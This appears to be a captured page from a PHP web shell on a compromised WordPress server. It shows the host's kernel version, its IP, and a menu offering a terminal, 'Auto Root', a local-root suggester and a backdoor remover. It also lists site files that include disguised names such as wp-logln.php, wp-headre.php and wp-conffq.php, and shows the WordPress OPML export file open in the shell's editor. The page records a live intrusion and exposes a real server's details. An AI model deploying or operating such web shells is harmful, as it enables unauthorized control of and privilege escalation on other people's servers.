Linux newlinux5.pouyasazan.org 3.10.0-962.3.2.lve1.5.60.el7.x86_64 #1 SMP Fri Jul 23 07:07:00 EDT 2021 x86_64
LiteSpeed
Server IP : 88.99.66.243 & Your IP : 216.73.216.178
Domains :
Cant Read [ /etc/named.conf ]
User : wdbbsgxf
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
wdbbsgxf /
public_html /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
css
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
js
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
shop
[ DIR ]
drwxr-xr-x
2026-03-14 21:47
wp-admin
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
wp-content
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
wp-includes
[ DIR ]
dr-xr-xr-x
2026-02-07 11:45
.htaccess
0
B
-r--r--r--
2026-03-19 20:59
css.zip
242.01
MB
-rw-r--r--
2024-10-02 10:49
error_log
20
KB
-rw-r--r--
2026-03-20 00:26
index.php
0
B
-r--r--r--
2026-03-19 20:59
mah.php
0
B
-rw-r--r--
2024-07-17 07:15
php.ini
635
B
-rw-r--r--
2023-05-14 16:50
s.php
0
B
-rw-r--r--
2026-03-15 02:34
wp-activate.php
7.21
KB
-rw-r--r--
2024-04-03 04:31
wp-comments-post.php
2.27
KB
-rw-r--r--
2023-08-09 10:55
wp-conffq.php
308.59
KB
-rw-r--r--
2026-02-07 05:47
wp-config-sample.php
2.96
KB
-rw-r--r--
2024-07-17 07:15
wp-config.php
3.5
KB
-rw-r--r--
2024-03-14 12:19
wp-cron.php
8.25
KB
-rw-r--r--
2026-02-07 07:29
wp-headre.php
16.3
KB
-rw-r--r--
2025-12-13 11:40
wp-links-opml.php
2.44
KB
-rw-r--r--
2022-11-27 00:31
wp-load.php
3.84
KB
-rw-r--r--
2024-07-17 07:15
wp-login.php
50.04
KB
-rw-r--r--
2024-07-17 07:15
wp-logln.php
71.3
KB
-rw-r--r--
2026-03-14 21:30
wp-mail.php
8.33
KB
-rw-r--r--
2023-11-08 04:47
wp-settings.php
28.1
KB
-rw-r--r--
2024-07-17 07:15
wp-signup.php
33.58
KB
-rw-r--r--
2023-08-09 10:54
wp-trackback.php
4.77
KB
-rw-r--r--
2023-08-09 10:54
xmlrpc.php
3.17
KB
-rw-r--r--
2024-04-03 04:31
Save
Rename
<?php /** * Outputs the OPML XML format for getting the links defined in the link * administration. This can be used to export links from one blog over to * another. Links aren't exported by the WordPress export, so this file handles * that. * * This file is not added by default to WordPress theme pages when outputting * feed links. It will have to be added manually for browsers and users to pick * up that this file exists. * * @package WordPress */ require_once __DIR__ . '/wp-load.php'; header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true ); $link_cat = ''; if ( ! empty( $_GET['link_cat'] ) ) { $link_cat = $_GET['link_cat']; if ( ! in_array( $link_cat, array( 'all', '0' ), true ) ) { $link_cat = absint( (string) urldecode( $link_cat ) ); } } echo '<?xml version="1.0"?' . ">\n"; ?> <opml version="1.0"> <head> <title> <?php /* translators: %s: Site title. */ printf( __( 'Links for %s' ), esc_attr( get_bloginfo( 'name', 'display' ) ) ); ?> </title> <dateCreated><?php echo gmdate( 'D, d M Y H:i:s' ); ?> GMT</dateCreated> <?php /** * Fires in the OPML header. * * @since 3.0.0 */ do_action( 'opml_head' ); ?> </head> <body> <?php if ( empty( $link_cat ) ) { $cats = get_categories( array( 'taxonomy' => 'link_category', 'hierarchical' => 0, ) ); } else { $cats = get_categories( array( 'taxonomy' => 'link_category', 'hierarchical' => 0, 'include' => $link_cat, ) ); } foreach ( (array) $cats as $cat ) : /** This filter is documented in wp-includes/bookmark-template.php */ $catname = apply_filters( 'link_category', $cat->name ); ?> <outline type="category" title="<?php echo esc_attr( $catname ); ?>"> <?php $bookmarks = get_bookmarks( array( 'category' => $cat->term_id ) ); foreach ( (array) $bookmarks as $bookmark ) : /** * Filters the OPML outline link title text. * * @since 2.2.0 * * @param string $title The OPML outline title text. */ $title = apply_filters( 'link_title', $bookmark->link_name ); ?> <outline text="<?php echo esc_attr( $title ); ?>" type="link" xmlUrl="<?php echo esc_url( $bookmark->link_rss ); ?>" htmlUrl="<?php echo esc_url( $bookmark->link_url ); ?>" updated=" <?php if ( '0000-00-00 00:00:00' !== $bookmark->link_updated ) { echo $bookmark->link_updated; } ?> " /> <?php endforeach; // $bookmarks ?> </outline> <?php endforeach; // $cats ?> </body> </opml>